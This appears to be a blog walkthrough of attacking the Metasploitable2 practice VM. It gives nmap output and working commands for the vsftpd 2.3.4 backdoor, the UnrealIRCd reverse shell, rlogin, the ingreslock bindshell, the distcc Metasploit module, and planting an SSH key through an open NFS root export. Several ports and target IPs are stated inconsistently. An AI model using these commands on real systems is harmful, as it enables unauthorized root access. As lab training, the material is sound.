Vulnhub Writeup : Metasploitable2

Box Stats :

Box InformationDetails
Box NameMetasploitable2
Series Metasploitable
Release Date 12-06-2012
AuthorMetasploit
DifficultyEasy
Download Link Click Here

Network Scan

The IP of target box is 192.168.1.12, now performing nmap scan on target

$ nmap -sV --top-ports 1000 192.168.1.12 -oN nmap.txt

Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-22 13:40 EDT
Nmap scan report for 192.168.1.12
Host is up (0.0014s latency).
Not shown: 977 closed ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp   open  telnet      Linux telnetd
25/tcp   open  smtp        Postfix smtpd
53/tcp   open  domain      ISC BIND 9.4.2
80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp  open  rpcbind     2 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
512/tcp  open  exec        netkit-rsh rexecd
513/tcp  open  login?
514/tcp  open  shell       Netkit rshd
1099/tcp open  java-rmi    GNU Classpath grmiregistry
1524/tcp open  bindshell   Metasploitable root shell
2049/tcp open  nfs         2-4 (RPC #100003)
2121/tcp open  ftp         ProFTPD 1.3.1
3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
3632/tcp open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
5432/tcp open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open  vnc         VNC (protocol 3.3)
6000/tcp open  X11         (access denied)
6667/tcp open  irc         UnrealIRCd
8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
8180/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
8787/tcp open  drb         Ruby DRb RMI (Ruby 1.8; path /usr/lib/ruby/1.8/drb)
Service Info: Hosts:  metasploitable.localdomain, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 66.16 seconds

Some of the exploitable findings are rlogin (port 513), vsftpd 2.3.4 (port 22), ProFTPD 1.3.1 (port 2121), UnrealIRCd, (port 6667) and Distccd (3632).

Exploiting Vulnerable Services

rlogin

From nmap scan ew know that tcp ports 512, 513 and 514 are open. These ports are known as r services. The r service basically grant remote users to access the local user account on network. The configuration file of r services is on $HOME/.rhosts and if the configuration file is configured as + + then anybody can access the system. For more details about r service visit this link. Now to check or exploit this configuration rsh-client package on the system by using command apt-get install rsh-client and run command as root

$ sudo su
# rlogin -l root 192.168.1.12

Last login: Sun Oct 17 14:30:59 EDT 2021 from 192.168.1.6 on pts/1
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
You have mail.

root@metasploitable:~# id
uid=0(root) gid=0(root) groups=0(root)

root@metasploitable:~# cat ~/.rhosts
+ +

root@metasploitable:~#

vsftpd 2.3.4

VSFTPD is a popular ftpd server. the particular version of vsftpd 2.3.4 was backdoored by an unknown intruder. To trigger the backdoor attacker need to provide a smiley face ‘:)’ in the end of user field at the login.

To exploit the backdoor just trigger the backdoor then it starts to listen on port 6200, so we just need to connect to port 6200 on target system. Note: In my test vm the port 6200 is instantly closed when triggering process ends. So i just start nc in while loop so it connects to the target box instantly when backdoor is triggered.

$ while true
> do
> nc 192.168.56.12 6200
> done

Above command tries to connect to port 6200 repeatedly, now we trigger the backdoor in another terminal

$ printf "user Test:)\r\n\r\npass test1\r\n\r\n" | nc 192.168.1.12 21

Then our listener connects to the target system



$ while true
> do
> nc 192.168.56.12 6200
> done
(UNKNOWN) [192.168.1.12] 6200 (?) : Connection refused
(UNKNOWN) [192.168.1.12] 6200 (?) : Connection refused
(UNKNOWN) [192.168.1.12] 6200 (?) : Connection refused
(UNKNOWN) [192.168.1.12] 6200 (?) : Connection refused
whoami
vmlinuz 
python -c 'import pty;pty.spawn("/bin/bash")'
root@metasploitable:/# id
id
uid=0(root) gid=0(root)
root@metasploitable:/# cat /etc/lsb-release
cat /etc/lsb-release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=8.04
DISTRIB_CODENAME=hardy
DISTRIB_DESCRIPTION="Ubuntu 8.04"
root@metasploitable:/#

python -c “import pty;pty.spawn(‘/bin/bash’)” command gets us a prompt, which looks cool !!. To cancel it just press ctrl+c.

Unreal IRCD Backdoor

unrealIRCD 2.3.8 deamon is backdoored by someone which is undetected for 6 to 8 months. the backdoor will be triggered by “AB” which is send to the irc server in the login process along with the other command. we have a perl exploit for this which is available at exploit-db.com, just start the netcat listener and fire the exploit. I also write an exploit in python which can be downloaded from here. Start nc listener

$ nc -lvp 4444
Listening on [0.0.0.0] (family 0, port 4444)  

Fire the exploit

$ ./unrealIRCD.py -rh 192.168.56.12 -rp 6667 -lh 192.168.1.6 -lp 4444

Now we get reverse shell to our listener

$ nc -lvp 4444
listening on [any] 4444 ...
whoami
192.168.1.12: inverse host lookup failed: Host name lookup failure
connect to [192.168.1.6] from (UNKNOWN) [192.168.1.12] 44421
root
python -c "import pty;pty.spawn('/bin/bash')"
root@metasploitable:/etc/unreal# id
id
uid=0(root) gid=0(root)
root@metasploitable:/etc/unreal#

Ingreslock Backdoor

The port 1524 was the old “ingreslock” backdoor.

$ nc 192.168.56.101 1524
root@metasploitable:/# id
uid=0(root) gid=0(root) groups=0(root)
root@metasploitable:/#

Distccd Misconfiguration

distcc daemon is running on port 3632. Exploiting it with metasploit

msf6 > search distccd

Matching Modules
================

   #  Name                           Disclosure Date  Rank       Check  Description
   -  ----                           ---------------  ----       -----  -----------
   0  exploit/unix/misc/distcc_exec  2002-02-01       excellent  Yes    DistCC Daemon Command Execution

msf6 > use exploit/unix/misc/distcc_exec
msf6 exploit(unix/misc/distcc_exec) > show options

Module options (exploit/unix/misc/distcc_exec):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with synta
                                      x 'file:<path>'
   RPORT   3632             yes       The target port (TCP)

Exploit target:

   Id  Name
   --  ----
   0   Automatic Target


msf6 exploit(unix/misc/distcc_exec) > set RHOSTS 192.168.1.12
RHOSTS => 192.168.1.12
msf6 exploit(unix/misc/distcc_exec) > set payload cmd/unix/bind_perl
payload => cmd/unix/bind_perl
msf6 exploit(unix/misc/distcc_exec) > show options

Module options (exploit/unix/misc/distcc_exec):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS  192.168.1.12     yes       The target host(s), range CIDR identifier, or hosts file with synta
                                      x 'file:<path>'
   RPORT   3632             yes       The target port (TCP)

Payload options (cmd/unix/bind_perl):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LPORT  4444             yes       The listen port
   RHOST  192.168.1.12     no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Automatic Target

msf6 exploit(unix/misc/distcc_exec) > exploit

[*] Started bind TCP handler against 192.168.1.12:4444
[*] Command shell session 1 opened (0.0.0.0:0 -> 192.168.1.12:4444) at 2021-10-22 15:34:59 -0400
whoami
daemon
python -c "import pty;pty.spawn('/bin/bash')"
daemon@metasploitable:/tmp$ id
id
uid=1(daemon) gid=1(daemon) groups=1(daemon)
daemon@metasploitable:/tmp$

NFS[Network File System] misconfiguration

NFS can be identified by probing port 2049 directly or asking portmapper for a list of services. first make sure the rpcbind and nfs-common packages are installed properly. To install these packages type ‘apt-get install rpcbind’. Now we use rpcinfo to identify the NFS

$ sudo su 
# rpcinfo -p 192.168.1.12

   program vers proto   port  service
    100000    2   tcp    111  portmapper
    100000    2   udp    111  portmapper
    100024    1   udp  60541  status
    100024    1   tcp  55622  status
    100003    2   udp   2049  nfs
    100003    3   udp   2049  nfs
    100003    4   udp   2049  nfs
    100021    1   udp  47066  nlockmgr
    100021    3   udp  47066  nlockmgr
    100021    4   udp  47066  nlockmgr
    100003    2   tcp   2049  nfs
    100003    3   tcp   2049  nfs
    100003    4   tcp   2049  nfs
    100021    1   tcp  37583  nlockmgr
    100021    3   tcp  37583  nlockmgr
    100021    4   tcp  37583  nlockmgr
    100005    1   udp  57887  mountd
    100005    1   tcp  54394  mountd
    100005    2   udp  57887  mountd
    100005    2   tcp  54394  mountd
    100005    3   udp  57887  mountd
    100005    3   tcp  54394  mountd

where ‘-p’ flag is for probing. Now using showmount utility to determine the NFS mount information. To install showmount utility type ‘apt-get install nfs-common’

$ sudo su
# showmount -e 192.168.1.12                                                                        
Export list for 192.168.1.12:
/ *

where ‘-e’ flag means show the server’s exports files, ‘/*’ means the root file system is mounted. Now we can access the system by ssh deamon. To do this we will generate a new ssh key at attacking system, mount the NFS export , and add our key to root user account’s authorized_keys. now generating ssh keys

$ ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/home/kali/.ssh/id_rsa):
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /home/kali/.ssh/id_rsa
Your public key has been saved in /home/kali/.ssh/id_rsa.pub
The key fingerprint is:
SHA256:2sIvq/CpXO0gNnrBAwTH2u39jGs6VaBQzOO2k9kHGyg kali@kali
The key's randomart image is:
+---[RSA 3072]----+
|o..+.            |
| oo + .          |
|.o + + .         |
|o E * o .        |
| o + * =S        |
|  + *o=o.        |
|  =ooo==.        |
| +.*.++oo        |
|..o.==++.        |
+----[SHA256]-----+

Now we need to mount the server’s exports filesystem which is root and overwrite the servers authorized access keys with the attackers public keys

root@kali:~# mkdir /tmp/r00t
root@kali:~# mount -t nfs 192.168.1.12:/ /tmp/r00t/
root@kali:~# cat ~/.ssh/id_rsa.pub >> /tmp/r00t/root/.ssh/authorized_keys 
root@kali:~# umount /tmp/r00t/

Now ssh the target vm

# ssh root@192.168.1.12

The authenticity of host '192.168.1.12 (192.168.1.12)' can't be established.
RSA key fingerprint is SHA256:BQHm5EoHX9GCiOLuVscegPXLQOsuPs+E9d/rrJB84rk.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.1.12' (RSA) to the list of known hosts.
Last login: Sun Oct 17 18:48:37 2021 from 192.168.1.6
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
You have mail.
root@metasploitable:~#

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.